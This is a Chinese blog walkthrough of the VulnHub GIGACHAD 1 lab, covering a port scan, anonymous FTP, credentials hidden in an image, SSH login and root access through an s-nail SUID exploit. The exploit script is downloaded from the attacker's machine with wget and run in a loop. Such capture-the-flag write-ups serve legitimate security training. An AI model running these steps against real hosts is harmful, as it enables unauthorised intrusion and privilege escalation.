GIGACHAD 1实战演练

已于 2023-06-19 20:43:58 修改
阅读量111 收藏 1
点赞数
分类专栏: vulnhub 文章标签: linux 运维 服务器
于 2023-06-19 19:09:52 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/longlangci/article/details/131293507
版权

文章目录

GIGACHAD 1实战演练

一、前期准备
1、相关信息

靶机网站:https://www.vulnhub.com/entry/gigachad-1,657/

设备名称IP地址
攻击机:kali192.168.2.78
靶机:GIGACHAD 1192.168.2.33
二、信息收集
1、端口扫描
┌──(kali㉿kali)-[~]
└─$ nmap -A 192.168.2.33

# 开放FTP:21端口、SSH:22端口、WEB:80端口
# FTP:21端口版本号为vsfpd3.0.3,匿名登录有个文件
# SSH:22端口版本号为OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
# WEB:80端口中间件为Apache httpd 2.4.38

在这里插入图片描述

2、FTP登录
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.2.33

在这里插入图片描述

3、查看文件类型
┌──(kali㉿kali)-[~]
└─$ file chadinfo

# 文件类型为zip压缩包

在这里插入图片描述

4、解压文件
# 解压文件
┌──(kali㉿kali)-[~]
└─$ unzip chadinfo
# 查看文件
┌──(kali㉿kali)-[~]
└─$ cat chadinfo

# 用户名:chad
# 密码见图片

在这里插入图片描述

5、访问网站
http://192.168.2.33/

在这里插入图片描述

6、访问图片并保存
http://192.168.2.33/drippinchad.png

┌──(kali㉿kali)-[~]
└─$ wget "http://192.168.2.33/drippinchad.png"

在这里插入图片描述

在这里插入图片描述

7、查看图片内容
# 用户名:chad
# 密码:maidenstower

在这里插入图片描述

8、远程连接
┌──(kali㉿kali)-[~]
└─$ ssh chad@192.168.2.33

在这里插入图片描述

三、后渗透
1、查看第一个flag
chad@gigachad:~$ ls -alh
chad@gigachad:~$ cat user.txt

在这里插入图片描述

2、查找SUID文件
chad@gigachad:~$ find / -perm -u=s -type f 2>/dev/null

在这里插入图片描述

3、查找POC
┌──(kali㉿kali)-[~]
└─$ searchsploit s-nail  

┌──(kali㉿kali)-[~]
└─$ cp -r /usr/share/exploitdb/exploits/multiple/local/47172.sh /home/kali

在这里插入图片描述

4、下载文件
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server

chad@gigachad:~$ wget "http://192.168.2.78:8000/47172.sh"

在这里插入图片描述

5、赋权限并执行脚本
chad@gigachad:~$ chmod +x 47172.sh 
chad@gigachad:~$ while true;do ./47172.sh;done

在这里插入图片描述

6、查看第二个flag
# 美化终端
python3 -c "import pty;pty.spawn('/bin/bash')"
# 查看第二个flag
root@gigachad:~# cd /root/
root@gigachad:/root# ls -alh
root@gigachad:/root# cat root.txt

在这里插入图片描述

liebe1*1
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
攻防演练总结1
qq_40334963的博客
11-03 5059
攻防演练总结1 web渗透 弱口令 傻瓜版本弱口令:admin/123456 admin/admin@123 admin/abcd1234! sysadmin/123456(即使登录口有验证码和登录次数限制爆破,手工尝试也极容易命中 ) 稍微好一点的就是账号/密码使用身份证号,邮箱等个人信息组合,攻击者要想爆破此类密码就需要收集目标个人信息制作字典,加大了攻击难度。 Sql注入 利用方法:...
Gigachad靶机实验实战演练
lianliandad的博客
11-18 716
好好学习天天向上
实战演练——保存QQ密码
Winda_shi的博客
05-26 3102
保存QQ密码 创建程序 创建一个名为SaveQQ的应用程序,指定包名为cn.itcast.saveqq,设计用户交互界面,登录界面(activity_main.xml)代码: <?xml version="1.0" encoding="utf-8"?> <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com
android studio中 实战演练——天气预报 程序
热门推荐
Winda_shi的博客
03-20 2万+
实战演练——天气预报 程序 (有问题可以评论,一起交流) 1.创建程序 2.创建完成之后,设计用户交互界面。 编辑activity_main.xml 文件:(代码如下) <?xml version="1.0" encoding="utf-8"?> <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/to
实战演练--保存QQ账号与密码
NIng_jies的博客
11-22 1353
实战演练——保存QQ账号与密码
FPGA设计实战演练(高级技巧篇)
qq_34244712的博客
08-20 2315
初学者,不太建议读这本书,你会感觉FPGA设计好复杂,等在你做过2个项目之后,在慢慢体会这些书里的设计理念,可能慢慢就懂了。
Android Studio中实战演练——绿豆通讯录
Winda_shi的博客
05-24 9808
绿豆通讯录 创建程序 创建一个名为Directory的应用程序,指定包名为cn.itcast.directory,设计用户交互界面: 注:包名要为这个名称,不然后面运行时可能会有报错。 <?xml version="1.0" encoding="utf-8"?> <RelativeLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.androi
happycorp_1 靶机实验实战演练
lianliandad的博客
06-29 993
happycorp_1靶机
实战演练——拦截史迪仔电话
Winda_shi的博客
05-19 1873
拦截史迪仔电话(广播接收者) 创建程序: 创建一个名为InterceptCall 的应用程序,指定包名为cn.itcast.interceptcall,设计用户交互界面。 先把界面写好:(还有先准备一张图片 作为背景图,放在drawable 文件夹里面android:background="@drawable/sdz") <?xml version="1.0" encoding="utf-8"?> <RelativeLayout xmlns:android="http://sc
Spring Boot实战演练Demo
09-06
《Spring Boot实战演练Demo》是基于Java开发框架Spring Boot的一次深入实践,旨在帮助开发者更好地理解和运用Spring Boot进行快速开发。这个Demo包含了丰富的代码示例和详细的解释,以辅助学习者通过实例掌握Spring ...
FPGA设计实战演练(高级技巧篇)
11-16
一生中有幸成为新发现或新思想的一部分的机会屈指可数。某些思想或革新会极大地改变我们所生活的 世界。想一想如果生物科学家完成了整个人类基因的绘制 — 确定了DNA结构的最后一个基因,美国国 ...
C#与.NET技术平台实战演练
12-02
C#与.NET技术平台实战演练
Kafka 实战演练 1
09-28
Kafka实战演练1将带领我们初步了解Kafka的核心概念和基本操作,让我们一起探索这个强大的工具。 首先,Kafka是由LinkedIn开发并贡献给Apache软件基金会的一个开源项目。它的主要设计目标是提供高吞吐量的实时发布...
Linux:基础命令学习
qq_55038440的博客
07-20 1250
实例:-F根据文件类型在列出的文件名称后加一符号。实例: -R 递归显示目录中的所有文件和子目录。. 开头的隐藏文件也会列出。可执行文件则加 "*",用于显示目录文件信息。
【Linux】条件变量及生产者消费者模型
最新发布
2301_78636079的博客
07-23 970
条件变量与生产消费者模型
Linux:进程信号(一.认识信号、信号的产生及深层理解、Term与Core)
qq_74415153的博客
07-23 1401
1.认识信号 进程看待信号方式 2.信号的产生 2.1信号的处理的方式 --- signal()函数 2.2kil指令产生信号 2.3键盘产生信号 2.4系统调用发送信号 -kil系统调 用、raise()和abort()库函数 2.5软件条件产生信号 2.6异常产生信号 3.信号产生的深层理解 键盘产生信号 异常产生信号 4.Term与Core core文件
【Linux】-----权限详解
m0_73470633的博客
07-21 726
Linux权限详解,看这一篇就够了!!!!!!
【Linux】如何使用docker快速部署Stirling-PDF并实现远程处理本地文档
2301_77053417的博客
07-22 1558
本篇文章我们将在Linux上使用Docker在本地部署一个开源的PDF工具——Stirling PDF,并且结合cpolar的内网穿透实现公网随时随地访问。Stirling PDF一个强大的本地托管的基于Web的PDF操作工具,使用Docker,允许您对PDF文件执行各种操作,如分割、合并、转换、重组、添加图片、旋转、压缩等。这个本地托管的Web应用程序最初是一个100%由ChatGPT制作的应用程序,现在已经发展到包含了一系列的功能,以满足您所有的PDF需求。
实战演练,qq登录界面
08-28
实战演练是指通过实践操作来加强对特定任务或技能的掌握和磨炼。对于QQ登录界面的实战演练,可以从以下几个方面进行讨论: 首先,实战演练能够提高用户在使用QQ登录界面时的操作熟练度。通过反复的实际登录操作,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

liebe1*1

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值